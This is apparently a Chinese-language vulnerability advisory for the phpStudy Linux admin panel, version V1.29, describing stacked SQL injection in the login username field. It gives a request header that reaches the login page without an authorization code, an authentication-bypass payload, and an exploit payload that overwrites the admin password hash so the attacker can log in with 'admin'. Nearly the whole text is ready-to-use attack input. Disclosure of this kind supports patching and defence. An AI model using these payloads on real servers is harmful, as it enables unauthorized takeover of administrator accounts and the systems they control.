漏洞描述

phpStudy Linux 后台登录页面账号处存在堆叠注入。

影响版本

  • V1.29

漏洞复现

请求头带上以下参数即可直接访问面板登录页面,无需登录授权码

X-Requested-With: XMLHttpRequest

  • POC:
    admin' or 1=1--

  • EXP:
    注意,此代码会直接修改登录密码为admin,请谨慎操作!

    admin';UPDATE ADMINS set PASSWORD = '67f43efc5701784db1504e4993d7e393' where username = 'admin';--

  • 使用admin密码登录